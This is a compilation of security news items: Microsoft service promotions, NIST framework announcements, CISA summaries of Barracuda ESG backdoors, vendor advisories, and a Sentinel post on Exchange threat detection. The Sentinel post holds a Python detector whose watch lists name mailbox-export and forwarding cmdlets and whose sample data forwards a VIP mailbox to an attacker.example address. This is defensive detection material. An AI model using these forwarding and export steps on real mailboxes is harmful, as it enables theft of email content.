Revolutionize Managed XDR with Microsoft

The cybersecurity industry needs an additional 3.4 million skilled workers to protect against rising digital crime. Your company can use Microsoft Defender Experts for XDR, a managed extended detection and response (MXDR) service, to help fill this workforce gap. Defender Experts for XDR elevates threat-detection capabilities by combining AI technology with human expertise, and helps you create a strategic plan to prevent future attacks. In this webinar, you will get real-life insights into how managed XDR can help your business:

  • Merge human expertise and AI capabilities to detect, contain, and resolve threats faster
  • Protect email, identity, cloud apps, and endpoint systems
  • Improve efficiency by reducing false detections and providing around-the-clock coverage

Register now to enhance your cyber-protection capabilities with managed XDR.

Thursday, September 7, 2023
11:00 AM Pacific Time / 2:00 PM Eastern Time
 
Register now >

NIST Now Available — Final Project Description for Manufacturing Supply Chain Traceability Using Blockchain-Related Technology 

Overview:

Manufacturing supply chains are increasingly critical to maintaining the health, security, and the economic strength of the United States. As supply chains supporting critical infrastructure become more complex and the origins of products become harder to discern, efforts are emerging that improve traceability of goods by exchanging traceability data records using distributed ledger and other blockchain-related technologies. 

This publication introduces the concept of a manufacturing supply chain “traceability chain,” which comprises a series of manufacturing traceability records written to industry-specific ecosystem blockchain-related technologies. The traceability chain is intended to provide supply chain visibility from end user back to original components. The Project Description describes a Traceability Chain Minimum Viable Product (MVP) reference implementation as a starting point for further research and refinement. NCCoE cybersecurity experts will address this challenge through collaboration with a Community of Interest, including vendors of cybersecurity solutions. The resulting reference design will detail an approach that can be incorporated across multiple sectors.

To learn more about the decentralized data approach to help secure supply chains in manufacturing and critical infrastructure sectors, visit our project page.

Get Engaged

You can continue to help shape and contribute to this and future projects by joining the NCCoE’s Blockchain Community of Interest.

Contact Us:

If you have any questions, please reach out to the NCCoE Blockchain team at [email protected].

Visit the Project Page

How the Microsoft Incident Response team helps customers remediate threats

Each year, organizations face tens of billions of malware, phishing, and credential threats—with real-world impacts. When an attack succeeds, it can result in grave impacts on any industry. For example, it could delay a police or fire department’s response to an emergency, prevent a hospital from accessing lifesaving equipment or patient data, or shut down a business and hold an organization’s intellectual property hostage.

Managing a security incident involves technical complexities, unknown variables—and often, frustration. Many organizations face a lack of specialized incident response knowledge, long breach resolution times, and difficulty improving their security posture due to ongoing demands on their stretched cybersecurity resources. Microsoft Incident Response is committed to partnering with organizations to combat the growing threat. Our team of experts has the knowledge and experience to help you quickly and effectively respond to any security incident, regardless of its size or complexity.


Who is the Microsoft Incident Response team?

Protecting customers is core to Microsoft’s mission, which is why our worldwide Microsoft Incident Response service exists. Staffed by specialists with deep experience helping organizations detect, respond to, and recover from cybersecurity incidents, the team mobilizes within hours of an incident to help customers remove bad actors, mend their defenses, and build resilience against future attacks.

We’re global: Our Microsoft Incident Response team is available to customers around the clock. We serve 190 countries and resolve attacks from the most sophisticated nation-state threat actor groups down to rogue individual attackers.

We have unparalleled expertise: Since 2008, we’ve provided our customers with incident response services that leverage the full depth and breadth of Microsoft’s entire threat intelligence network, and unparalleled access to our product engineering teams. These security defenders work in concert to help protect the platforms, tools, services, and endpoints that support our online lives.

We’re backed by threat intelligence: Microsoft Incident Response conducts intelligence-driven investigations that tap into the 65 trillion signals collected every day, and track more than 300 unique threat actors, including 160 nation-state actors, 50 ransomware groups, and hundreds of others to detect, investigate, and respond to security incidents. These data signals and our deep knowledge of current threat actors are used to create a threat intelligence feedback loop, which imposes costs on the actors themselves. By sharing information with other organizations and law enforcement agencies, the team helps to disrupt the attackers’ operations and make it more difficult for them to carry out their attacks. The team is committed to continuing to work with its partners to make the internet a safer place for everyone.

We collaborate: Microsoft Incident Response has been collaborating with government agencies and global security organizations to fight cybercrime everywhere it lurks for more than 15 years. Our long-term relationships have spanned the biggest attack recoveries around the globe, and our experience collaborating across internal and external teams helps us to swiftly cut through red tape and resolve critical, urgent security problems for our customers.

Our Microsoft Incident Response team members span several roles to give customers complete and deep expertise to investigate and secure their environment post-security breach and to help prevent a breach in the first place. This team has helped customers of all sizes and industries respond to and recover from cyberattacks. Here are a few examples of how we have helped customers:

  • In 2022, we helped the Government of Albania recover from a sophisticated cyberattack. The attack was carried out by a state-sponsored actor, and it involved both ransomware and a wiper. We were able to help the government isolate the affected systems, remove the attackers, and restore its systems to full functionality.
  • In 2021, we helped a large financial services company respond to a ransomware attack. The attack was particularly damaging, as it encrypted the company’s customer data. We were able to help the company decrypt the data and restore its systems to full functionality.
  • In 2020, we helped a healthcare organization respond to a phishing attack. The attack resulted in the theft of patient data. We were able to help the organization identify the compromised accounts, reset the passwords, and implement additional security controls to prevent future attacks.

These are just a few examples of how the Microsoft Incident Response team has helped customers. We are committed to helping our customers minimize the impact of a cyberattack and restore their systems to full functionality as quickly as possible. Figure 1 shows an example of an anonymized customer journey with Microsoft Incident Response.


Figure 1. This image depicts a customer journey based on a typical ransomware scenario where the customer engaged Microsoft to assist with initial investigation and Entra ID recovery. It outlines four phases: collaboration and tool deployment (green), reactive incident response (blue), recovery with attack surface reduction and eradication plan (red), and compromise recovery with strategic recommendations for modernization (green). The journey involves hardening, tactical monitoring, and presenting modernization recommendations at the end of the Microsoft engagement.

What Microsoft Incident Response does

Up to 83 percent of organizations will experience a data breach at some point, and stolen or compromised credentials are both the most common initial attack vector and the slowest to identify (an average of 327 days).1 We have seen the volume of password attacks rise to an estimated 921 attacks every second, a 74 percent increase in just one year.2 Our first step when a customer calls during a crisis is to assess their current situation and understand the scope of the incident. Over the years, our team has dealt with everything from crypto malware making an entire environment unavailable to a nation-state attacker maintaining covert administrative persistence in an environment. We work with the customer to identify the line-of-business apps affected and get systems back online. As we work through the scope of the incident, we gain the knowledge our experts need to move to the next stage of managing an incident: compromise recovery.

Contrary to how ransomware is sometimes portrayed in the media, it is rare for a single ransomware variant to be managed by one end-to-end “ransomware gang.” Instead, there are separate entities that build malware, gain access to victims, deploy ransomware, and handle extortion negotiations. The industrialization of the criminal ecosystem has led to:

  • Access brokers that break in and hand off access (access as a service).
  • Malware developers that sell tooling.
  • Criminal operators and affiliates that conduct intrusions.
  • Encryption and extortion service providers that take over monetization from affiliates (ransomware as a service).

All human-operated ransomware campaigns share common dependencies on security weaknesses. Specifically, attackers usually take advantage of an organization’s poor cyber hygiene, which often includes infrequent patching and failure to implement multifactor authentication.

While every breach recovery is different, the recovery process for customers is often quite similar. A recovery will consist of scoping the compromise, critical hardening, tactical monitoring, and rapid eviction. For example, our experts conduct the following services:

  • Restore directory services functionality and increase its security resilience to support the restoration of business.
  • Conduct planning, staging, and rapid eviction of attackers from their known span of control, addressing identified accounts, backdoors, and command and control channels.
  • Provide a baseline level of protection and detection layers to help prevent a potential re-compromise and to increase the likelihood of rapid detection should there be an indicator of re-compromise in the environment.

To mitigate a compromise, it is important to understand the extent of the damage. This is similar to how doctors diagnose patients before prescribing treatment. Our team can investigate compromises that have been identified by Microsoft or a third party. Defining the scope of the compromise helps us avoid making unnecessary changes to the network. Compromise recovery is about addressing the current attacker. Our team uses the following model to do this: Authentication (who performed the actions?), Access (where did the actions originate from?), and Alteration (what was changed on the system?).

Our teams then work to secure the assets that matter most to organizations, such as Active Directory, Exchange, and Certificate Authorities. Next, we secure the admin path. Simply put, we make sure you, our customers, regain administrative control of your environment. A daunting 93 percent of our investigations reveal insufficient privilege access controls, including unnecessary lateral movement.2 Because our large team of experts helps so many customers, we understand what works well to secure an environment quickly. When it comes to tactical, swift recovery actions, we focus on what is strictly necessary for you to take back control first, then move on to other important security measures like hardening high-impact controls to prevent future breaches and putting procedures in place to ensure control can be maintained.

The assessment, containment, and recovery activities are the critical, immediate, and reactive services our experts deploy to help minimize breach impact and regain control. But our proactive services can help customers maintain that control, improve their security stance, and prevent future incidents.

All this expertise is supported by a number of technologies that are proprietary to Microsoft.

What technologies we leverage

Microsoft products and services, proprietary and forensic tools, and data sourced from the breach incident all help our team act faster to minimize the impact of an incident. Combined with our on-demand specialized experts and our access to threat landscapes across different industries and geographies, these scanning and monitoring tools are part of a comprehensive security offense and defense.

For point-in-time deep scanning:

  • Proprietary incident response tooling for Windows and Linux.
  • Forensic triage tool on devices of interest.
  • Entra ID security and configuration assessment.
  • Additional Azure cloud tools.

For continuous monitoring:

  • Microsoft Sentinel—Provides a centralized source of event logging. Uses machine learning and artificial intelligence.
  • Microsoft Defender for Endpoint—For behavioral, process-level detection. Uses machine learning and artificial intelligence to quickly respond to threats while working side-by-side with third-party antivirus vendors.
  • Microsoft Defender for Identity—For detection of common identity threats and analysis of authentication requests. It examines the authentication traffic that on-premises Active Directory domain controllers receive from all operating systems and uses machine learning and artificial intelligence to quickly report many types of threats, such as pass-the-hash, golden and silver tickets, skeleton keys, and many more.
  • Microsoft Defender for Cloud Apps—A cloud access security broker that supports various deployment modes including log collection, API connectors, and reverse proxy. It provides rich visibility, control over data travel, and sophisticated analytics to identify and combat cyberthreats across all your Microsoft and third-party cloud services.

Figure 2. This top-down image diagram highlights the Microsoft Incident Response team’s broad visibility with various icons representing distinct aspects of the Microsoft tool advantages. The left column shows how Microsoft Incident Response proprietary endpoint scanners combine with enterprise data, including Active Directory configuration, antivirus logs, and global telemetry from Microsoft Threat Intelligence, which analyzes over 6.5 trillion signals every day to identify emerging threats to protect customers. The blue second column titled Continuous Monitoring illustrates how the team utilizes the toolsets of the Microsoft Defender platform, including Microsoft Defender for Office 365, Microsoft Defender for Endpoint, Microsoft Defender for Cloud Apps, Microsoft Defender for Identity, Microsoft 365 Defender, Microsoft Sentinel, Microsoft Defender Experts for Hunting, and Microsoft Defender for Cloud. Incident response teams collaborate with different teams and technologies and utilize deep scans with proprietary toolsets, while also continuously monitoring the environment through Microsoft Defender.

A tenacious security mindset

Incident response needs vary by customer, so Microsoft Incident Response service options are available as needed or on a retainer basis, for proactive attack preparation, reactive crisis response, and compromise recovery. At the end of the day, your organization’s cybersecurity is mostly about adopting a tenacious security mindset, embraced and supported by everyone in the organization.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and Twitter (@MSFTSecurity) for the latest news and updates on cybersecurity.


1Cost of a Data Breach Report 2022, IBM. 2022.

2Microsoft Digital Defense Report 2022, Microsoft. 2022.

Introducing the NIST Cybersecurity Framework 2.0 Reference Tool!

NIST Cybersecurity Framework wheel has outer sections Identify, Protect, Detect, Respond and Recover; internal circle is Govern.

Today, NIST is officially unveiling our new Cybersecurity Framework (CSF) 2.0 Reference Tool. This resource allows users to explore the Draft CSF 2.0 Core (Functions, Categories, Subcategories, Implementation Examples) and offers human and machine-readable versions of the draft Core (in both JSON and Excel formats). Currently, the tool allows users to view and export portions of the Core using key search terms. This tool will ultimately enable users to create their own version of the CSF 2.0 Core with selected Informative References and will provide a simple and streamlined way for users to explore different aspects of the CSF Core. 

NIST will continue to add additional features to the CSF 2.0 Reference Tool in the coming months (for example, Informative References will be added once CSF 2.0 is finalized in early 2024, which will help to show the connection between the CSF and other cybersecurity frameworks, standards, guidelines, and resources).

Other Important News:

Thank you for sharing in our excitement and for being such an important part of this process. As always, please continue to visit our Journey to CSF 2.0 website for important news, updates, and documents in the coming months—and follow us on X via @NISTcyber.

See the CSF 2.0 Reference Tool!

Malware Analysis Reports on Barracuda Backdoors

The Cybersecurity and Infrastructure Security Agency (CISA) has published four Malware Analysis Reports on malware variants associated with exploitation of CVE-2023-2868. CVE-2023-2868 is a remote command injection vulnerability affecting Barracuda Email Security Gateway (ESG) Appliance versions 5.1.3.001 through 9.2.0.006. It was exploited as a zero day as early as October 2022 to gain access to ESG appliances. According to industry reporting, the actors exploited the vulnerability to gain initial access to victim systems and then implanted backdoors to establish and maintain persistence.
CISA analyzed backdoor malware variants obtained from an organization that had been compromised by threat actors exploiting the vulnerability.
  • WHIRLPOOL – A backdoor that establishes a Transport Layer Security (TLS) reverse shell to the command-and-control (C2) server.
  • Barracuda Exploit Payload and Backdoor – The payload exploits CVE-2023-2868, leading to the dropping and execution of a reverse shell backdoor on the ESG appliance. The reverse shell establishes communication with the threat actor’s C2 server, from which it downloads the SEASPY backdoor to the ESG appliance. The actors delivered the payload to the victim via a phishing email with a malicious attachment.
  • SEASPY – A persistent, passive backdoor that masquerades as a legitimate Barracuda service. SEASPY monitors traffic from the actor’s C2 server; when the right packet sequence is captured, it establishes a Transmission Control Protocol (TCP) reverse shell to the C2 server. The shell allows the threat actors to execute arbitrary commands on the ESG appliance.
  • SUBMARINE – A novel persistent backdoor executed with root privileges that lives in a Structured Query Language (SQL) database on the ESG appliance. SUBMARINE comprises multiple artifacts, including a SQL trigger, shell scripts, and a loaded library for a Linux daemon, that together enable execution with root privileges, persistence, command and control, and cleanup. CISA also analyzed artifacts related to SUBMARINE that contained the contents of the compromised SQL database. This malware poses a severe threat for lateral movement.
For more information on the exploit payload and the SEASPY, WHIRLPOOL, and SUBMARINE backdoors, including indicators of compromise and YARA rules for detection, see the following Malware Analysis Reports:

  • SEASPY and WHIRLPOOL Backdoors: MAR-10454006.r4.v2.CLEAR
  • Exploit Payload Backdoor: MAR-10454006-r3.v1.CLEAR
  • SEASPY Backdoor: MAR-10454006-r2.v1.CLEAR
  • SUBMARINE Backdoor: MAR-10454006-r1.v2.CLEAR
For more information on CVE-2023-2868, see Barracuda’s page, Barracuda Email Security Gateway Appliance (ESG) Vulnerability, and Mandiant’s blog post, Barracuda ESG Zero-Day Vulnerability (CVE-2023-2868) Exploited Globally by Aggressive and Skilled Actor.

Juniper Releases Security Advisory for Multiple Vulnerabilities in Junos OS

Juniper has released a security advisory to address vulnerabilities in Junos OS on SRX Series and EX Series devices. A remote cyber threat actor could exploit these vulnerabilities to cause a denial-of-service condition.

CISA encourages users and administrators to review Juniper’s Support Portal and apply the necessary updates.


ShareFile StorageZones Controller Security Update for CVE-2023-24489

Description of Problem

A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller.

This vulnerability affects all currently supported versions of customer-managed ShareFile storage zones controller before version 5.11.24.

This bulletin only applies to customer-managed ShareFile storage zones controllers. Customers using ShareFile-managed storage zones in the cloud do not need to take any action.

The issue has been given the following identifier: 

CVE ID: CVE-2023-24489
Affected Products: Citrix Content Collaboration
Description: Improper resource control allows unauthenticated remote compromise
Pre-requisites: Network access to the ShareFile storage zones controller
CWE: CWE-284
CVSS: 9.1

What Customers Should Do

This issue has been addressed in the following versions of the customer-managed ShareFile storage zones controller:

  • ShareFile storage zones controller 5.11.24 and later versions

Customers are required to upgrade to the fixed version.  

The latest version of ShareFile storage zones controller is available from the following location:

https://www.citrix.com/downloads/sharefile/product-software/sharefile-storagezones-controller-511.html

Instructions for upgrading the Storage Zones Controller are here:

https://docs.sharefile.com/en-us/storage-zones-controller/5-0/upgrade.html

All customer-managed ShareFile storage zones controller versions prior to the latest version, 5.11.24, have been blocked to protect our customers. Customers will be able to reinstate the storage zones controller once the update to 5.11.24 is applied.

Customers should shut down any machine that was running an affected version of the storage zones controller software.


Acknowledgements

ShareFile thanks Dylan Pindur of Assetnote for working with us to protect ShareFile customers.


What Citrix is Doing

Citrix is notifying customers and channel partners about this potential security issue through the publication of this security bulletin on the Citrix Knowledge Center at https://support.citrix.com/securitybulletins.


Obtaining Support on This Issue

If you require technical assistance with this issue, please contact Citrix Technical Support. Contact details for Citrix Technical Support are available at https://www.citrix.com/support/open-a-support-case.


Subscribe to Receive Alerts

Citrix strongly recommends that all customers subscribe to receive alerts when a Citrix security bulletin is created or modified at https://support.citrix.com/user/alerts.


Reporting Security Vulnerabilities to Citrix

Citrix welcomes input regarding the security of its products and considers any and all potential vulnerabilities seriously. For details on our vulnerability response process and guidance on how to report security-related issues to Citrix, please see the following webpage: https://www.citrix.com/about/trust-center/vulnerability-process.html.


Disclaimer

This document is provided on an “as is” basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information on the document is at your own risk. Citrix reserves the right to change or update this document at any time. Customers are therefore recommended to always view the latest version of this document directly from the Citrix Knowledge Center.


Changelog

2023-06-13T15:30:00Z  CSAF Update
2023-06-13T12:30:00Z  Initial Publication
2023-08-17T20:30:00Z  Update recommendations to customers to include shutting down affected systems

Microsoft 365 Virtual Training Day: Managing Windows and Surface Devices

Accelerate your deployment and utilization of the latest endpoint management capabilities in support of remote, on-premises, and hybrid work. Join us at Microsoft 365 Virtual Training Day: Managing Windows and Surface Devices from Microsoft Learn to see how to simplify the management of your desktops, devices, and cloud services with Microsoft Endpoint Manager. This free training is relevant across all deployment stages, whether you are currently using Microsoft Configuration Manager to manage your devices, have started the path to cloud management, or are managing all your endpoints natively with Microsoft Intune. Once you have learned the basics of Endpoint Manager, we will shift the focus to Microsoft Surface, where you will discover how to deploy a secure device. You will get the tools and training to put Surface to work, creating a high level of endpoint security through integrated hardware, firmware, software, and identity protection. You will have the opportunity to:

  • Learn how to plan and run an effective deployment of Windows 10.
  • Deploy and manage configurations to organization- and user-owned devices.
  • Explore the versatile functions of Surface.

Join us at an upcoming two-part event:
Thursday, September 07, 2023 | 11:00 AM – 2:30 PM | (GMT-08:00) Pacific Time (US & Canada)
Friday, September 08, 2023 | 11:00 AM – 1:45 PM | (GMT-08:00) Pacific Time (US & Canada)

Delivery Language: English
Closed Captioning Language(s): English
 
REGISTER TODAY >

Cybersecurity and Privacy Mapping Guide: Draft NIST IR 8477 Available for Comment

NIST has released the initial public draft (ipd) of a new report for public comment: NIST Internal Report (IR) 8477 ipd, Mapping Relationships Between Documentary Standards, Regulations, Frameworks, and Guidelines: Developing Cybersecurity and Privacy Concept Mappings.

Understanding how the elements of diverse sources of cybersecurity and privacy content are related to each other is an ongoing challenge for people in nearly every organization. This document explains NIST’s proposed approach for identifying and documenting relationships between concepts such as controls, requirements, recommendations, outcomes, technologies, functions, processes, techniques, roles, and skills.

NIST intends for the approach to be used for mapping relationships involving NIST cybersecurity and privacy publications that will be submitted to NIST’s National Online Informative References (OLIR) Program for hosting in NIST’s online Cybersecurity and Privacy Reference Tool (CPRT). This will include mapping the equivalent of the NIST Cybersecurity Framework’s (CSF) 1.1 Informative References in support of CSF 2.0.

By following this approach, NIST and others in the cybersecurity and privacy standards community can jointly establish a single concept system over time that links cybersecurity and privacy concepts from many sources into a cohesive, consistent set of relationship mappings. The mappings can then be used by different audiences to better describe the interrelated aspects of the global cybersecurity and privacy corpus.

The public comment period for this draft is open through October 6, 2023. Download a copy of the draft and submit your comments to [email protected].

Read More

Microsoft Post: Help Protect your Exchange Environment With Microsoft Sentinel

We recently published two solutions in the Sentinel content hub catalog to assist you with better detecting threats and misconfigurations of your Exchange environment. One solution is focused on on-premises Exchange Server and the second is for Exchange Online. Both solutions can be used simultaneously when you have a hybrid Exchange environment.

Why now?

In recent years, we have seen an increase in attacks against messaging environments. Taking control of an Exchange Server or abusing someone’s mailbox can have catastrophic consequences for your organization. Analysis of previous Exchange security incidents highlighted detection gaps and common misconfigurations, both of which could easily have been avoided. In on-premises Exchange deployments it is common to see configurations that have grown organically through upgrades and successive administrators. Management and administrative practices may not have kept pace with threat actors, and in some cases have not changed in decades. Many configuration components are simply overlooked, and logs are rarely collected and centralized, which slows or prevents investigations.

Introducing Microsoft Exchange Security solutions

The two solutions aim to close detection gaps and to identify misconfigurations proactively, before they become a security incident. They collect critical logs, detect misconfigurations, and present the information in dynamic dashboards.

The Exchange Server solution looks at the following core components:

  • standard and custom RBAC delegation
  • remote domain configuration
  • local administrators permissions
  • high privileged groups members
  • POP/IMAP configuration
  • send and receive connector configuration

The Exchange Online solution looks at the following core components:

  • standard and custom RBAC delegation

Amongst the scenarios the solution enables, you will find the following:

  • Alert you when an administrative cmdlet is executed against a VIP user to exfiltrate content or to modify who can access it (you decide who the VIPs are).
  • Detect when a monitored server-oriented cmdlet and a monitored user-oriented cmdlet are run by the same user on the same server within 10 minutes of each other.
  • Improve your Exchange security posture by exposing misconfigurations in your Exchange environments.
  • Detect the use of custom Exchange RBAC configuration that can put your environment at risk.
  • Report on admin activities to optimize your delegation model.
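As an added example that is not part of the original post or of the solution itself (the solution's detections are Sentinel analytics rules written in KQL), here are the first two scenarios above implemented in Python over constructed Exchange admin audit records. The cmdlet categories, the VIP list, the record field names and the sample events are assumptions chosen for illustration; the only behaviour taken from the text is the two rules: flag content-exfiltrating cmdlets run against a VIP mailbox, and correlate a server-oriented cmdlet with a user-oriented cmdlet by the same caller on the same server within 10 minutes.

```python
"""Two of the detection scenarios listed above, run over constructed
Exchange admin audit log records.

Added example; not the Sentinel solution's own analytics rules (those are
KQL).  The cmdlet categories, the VIP list and the audit records are
assumptions chosen for illustration.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List

# Assumption: cmdlets that read, export or redirect mailbox content.
EXFIL_CMDLETS = {
    "New-MailboxExportRequest",    # export a mailbox to PST
    "Add-MailboxPermission",       # grant e.g. FullAccess to another account
    "Set-Mailbox",                 # only when it sets forwarding (checked below)
    "New-InboxRule",               # server-side forward/redirect rules
    "Set-MailboxFolderPermission",
}
# Assumption: what "server-oriented" vs "user-oriented" means for the
# 10-minute correlation rule; the real solution ships its own monitored lists.
SERVER_CMDLETS = {"Set-ReceiveConnector", "Set-SendConnector",
                  "Set-TransportConfig", "Set-OrganizationConfig",
                  "New-ManagementRoleAssignment"}
USER_CMDLETS = EXFIL_CMDLETS | {"Set-CASMailbox", "Set-User"}
# Assumption: the VIP mailboxes you decide to watch (compared case-insensitively).
VIPS = {"ceo@contoso.example", "cfo@contoso.example"}
WINDOW = timedelta(minutes=10)


@dataclass
class AdminAuditEvent:
    """Loosely modelled on the fields Search-AdminAuditLog returns."""
    run_date: datetime
    caller: str                 # account that ran the cmdlet
    cmdlet: str
    parameters: Dict[str, str]  # parameter name -> value
    object_modified: str        # mailbox, connector, ... the cmdlet targeted
    originating_server: str


def is_exfil_action(ev: AdminAuditEvent) -> bool:
    """Set-Mailbox is routine unless it configures forwarding; the other
    EXFIL_CMDLETS are suspicious against a VIP regardless of parameters."""
    if ev.cmdlet not in EXFIL_CMDLETS:
        return False
    if ev.cmdlet == "Set-Mailbox":
        return any(p in ev.parameters
                   for p in ("ForwardingSmtpAddress", "ForwardingAddress"))
    return True


def vip_exfil_alerts(events: List[AdminAuditEvent]) -> List[dict]:
    """Scenario 1: an administrative cmdlet run against a VIP mailbox that can
    exfiltrate content or change who can access it."""
    return [
        {"time": ev.run_date.isoformat(), "caller": ev.caller,
         "cmdlet": ev.cmdlet, "vip": ev.object_modified}
        for ev in events
        if is_exfil_action(ev) and ev.object_modified.lower() in VIPS
    ]


def server_user_correlation(events: List[AdminAuditEvent],
                            window: timedelta = WINDOW) -> List[dict]:
    """Scenario 2: a monitored server-oriented cmdlet and a monitored
    user-oriented cmdlet run by the same caller on the same server within
    `window` of each other (either order)."""
    groups: Dict[tuple, list] = {}
    for ev in events:
        if ev.cmdlet in SERVER_CMDLETS:
            category = "server"
        elif ev.cmdlet in USER_CMDLETS:
            category = "user"
        else:
            continue                      # not a monitored cmdlet
        key = (ev.caller.lower(), ev.originating_server.lower())
        groups.setdefault(key, []).append((ev, category))

    hits = []
    for (caller, server), tagged in groups.items():
        tagged.sort(key=lambda t: t[0].run_date)
        for i, (first, cat_first) in enumerate(tagged):
            for second, cat_second in tagged[i + 1:]:
                if second.run_date - first.run_date > window:
                    break                 # sorted, so nothing later can match
                if cat_first != cat_second:
                    delta = (second.run_date - first.run_date).total_seconds() / 60
                    hits.append({"caller": caller, "server": server,
                                 "first": first.cmdlet, "second": second.cmdlet,
                                 "delta_min": delta})
    return hits


def sample_events() -> List[AdminAuditEvent]:
    """Constructed audit records (not real data)."""
    t = datetime.fromisoformat
    return [
        AdminAuditEvent(t("2023-08-20T09:00:00"), "CONTOSO\\admin1", "Set-ReceiveConnector",
                        {"PermissionGroups": "AnonymousUsers"}, "EX01\\Default Frontend EX01", "EX01"),
        AdminAuditEvent(t("2023-08-20T09:04:00"), "CONTOSO\\admin1", "Add-MailboxPermission",
                        {"User": "svc-backup", "AccessRights": "FullAccess"}, "ceo@contoso.example", "EX01"),
        AdminAuditEvent(t("2023-08-20T09:30:00"), "CONTOSO\\admin1", "New-MailboxExportRequest",
                        {"FilePath": "\\\\EX01\\pst\\jane.pst"}, "jane.doe@contoso.example", "EX01"),
        # Set-Mailbox on a VIP without forwarding parameters: routine, no alert.
        AdminAuditEvent(t("2023-08-20T10:00:00"), "CONTOSO\\admin2", "Set-Mailbox",
                        {"DisplayName": "Chief Executive"}, "ceo@contoso.example", "EX02"),
        AdminAuditEvent(t("2023-08-20T10:05:00"), "CONTOSO\\admin2", "Set-Mailbox",
                        {"ForwardingSmtpAddress": "smtp:drop@attacker.example",
                         "DeliverToMailboxAndForward": "True"}, "ceo@contoso.example", "EX02"),
        # Server cmdlet two minutes later but on another server: no correlation.
        AdminAuditEvent(t("2023-08-20T10:07:00"), "CONTOSO\\admin2", "Set-TransportConfig",
                        {"MaxSendSize": "50MB"}, "Transport Settings", "EX03"),
        AdminAuditEvent(t("2023-08-20T10:12:00"), "CONTOSO\\svc-backup", "New-MailboxExportRequest",
                        {"FilePath": "\\\\EX01\\pst\\cfo.pst"}, "cfo@contoso.example", "EX01"),
    ]


if __name__ == "__main__":
    evs = sample_events()
    for a in vip_exfil_alerts(evs):
        print("VIP alert:", a)
    for h in server_user_correlation(evs):
        print("Correlation:", h)
```

Running the file prints three VIP alerts and one correlation hit from the sample. The Set-Mailbox special case matters in practice: the cmdlet is routine administration unless it sets forwarding, so alerting on every Set-Mailbox against a VIP would bury the rule in noise.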

How does it work?

The base of the solution is a script that connects directly to Microsoft Sentinel and uploads the results of its security configuration checks (the script runs on-premises for the on-premises version, and in an Azure Automation runbook for the online version). It uses the Log Analytics ingestion API to send the data straight to your Sentinel workspace.
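An added example (not the solution's own script) of what that upload step involves, assuming the SharedKey-authenticated HTTP Data Collector API, the older of the two Log Analytics ingestion APIs; the DCR-based Logs Ingestion API authenticates with an Entra ID bearer token instead of this signature. The workspace ID, key, log type and finding record below are constructed placeholders.

```python
"""Building a signed request for the Log Analytics HTTP Data Collector API,
the SharedKey-authenticated way to push custom records into a workspace.

Added example; not the solution's own script.  The workspace ID, key, log
type and records below are constructed placeholders.  The DCR-based Logs
Ingestion API is the newer alternative and uses Entra ID bearer tokens
instead of this signature.
"""
import base64
import hashlib
import hmac
import json
import re
import urllib.request
from datetime import datetime, timezone

RESOURCE = "/api/logs"
API_VERSION = "2016-04-01"
# Log-Type may only contain letters, digits and underscore (max 100 chars);
# Log Analytics appends "_CL" to it to name the custom table.
LOG_TYPE_RE = re.compile(r"^[A-Za-z0-9_]{1,100}$")


def rfc1123_utc_now() -> str:
    """x-ms-date must be RFC 1123 in GMT; the signature covers it."""
    return datetime.now(timezone.utc).strftime("%a, %d %b %Y %H:%M:%S GMT")


def build_signature(workspace_id: str, shared_key_b64: str, rfc1123_date: str,
                    content_length: int, method: str = "POST",
                    content_type: str = "application/json") -> str:
    """HMAC-SHA256 over the canonical string, keyed with the *decoded*
    workspace key, base64-encoded and prefixed with the workspace ID."""
    string_to_sign = (f"{method}\n{content_length}\n{content_type}\n"
                      f"x-ms-date:{rfc1123_date}\n{RESOURCE}")
    key = base64.b64decode(shared_key_b64)
    digest = hmac.new(key, string_to_sign.encode("utf-8"), hashlib.sha256).digest()
    return f"SharedKey {workspace_id}:{base64.b64encode(digest).decode('ascii')}"


def build_request(workspace_id, shared_key_b64, log_type, records, rfc1123_date=None):
    """Return (url, headers, body) for one POST of `records` (a list of flat
    JSON objects).  Body length is taken from the UTF-8 bytes actually sent,
    which is what the service verifies against the signature."""
    if not LOG_TYPE_RE.match(log_type):
        raise ValueError(f"invalid Log-Type {log_type!r}: letters, digits, underscore only")
    body = json.dumps(records).encode("utf-8")
    date = rfc1123_date or rfc1123_utc_now()
    headers = {
        "Content-Type": "application/json",
        "Authorization": build_signature(workspace_id, shared_key_b64, date, len(body)),
        "Log-Type": log_type,
        "x-ms-date": date,
        "time-generated-field": "TimeGenerated",  # record field used as TimeGenerated
    }
    url = f"https://{workspace_id}.ods.opinsights.azure.com{RESOURCE}?api-version={API_VERSION}"
    return url, headers, body


def send(url, headers, body, timeout=30) -> int:
    """POST the prepared request; HTTP 200 means the batch was accepted.
    Not called below, so the file runs offline."""
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.status


# Constructed placeholders: a dummy workspace ID and an all-zero key.
DEMO_WORKSPACE = "00000000-0000-0000-0000-000000000000"
DEMO_KEY = base64.b64encode(bytes(32)).decode("ascii")
DEMO_RECORDS = [{
    "TimeGenerated": "2023-08-20T09:00:00Z",
    "Server": "EX01",
    "Check": "ReceiveConnector_AnonymousRelay",
    "Finding": "Anonymous relay permission present on Default Frontend EX01",
    "Severity": "High",
}]

if __name__ == "__main__":
    url, hdrs, body = build_request(DEMO_WORKSPACE, DEMO_KEY, "ESIExchangeConfig", DEMO_RECORDS)
    print(url)
    for k, v in hdrs.items():
        print(f"{k}: {v}")
    print(body.decode())
```

The canonical string covers the method, the body length, the content type, x-ms-date and the resource path, so a mismatched Content-Length (for example, counting characters instead of UTF-8 bytes) or a badly skewed clock produces a 403 from the service rather than an ingested record. Treat the workspace key like a password: it authorizes writes to every custom table in the workspace.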

Note that the solution supports collecting from multiple Exchange organizations and multiple tenants into the same Sentinel workspace.

You can also configure the solution to upload additional data, such as audit logs, security events from Exchange servers and/or domain controllers, and IIS log files, using either the Azure Monitor Agent (with Azure Arc for servers outside Azure) or the Microsoft Monitoring Agent. You can then explore the data with carefully crafted workbooks to visualize your posture, and trigger incidents with analytics rules to alert you to important security events.

Your Exchange security posture quickly visualized (screenshot omitted).

A workbook helping you apply the least-privilege principle (screenshot omitted).

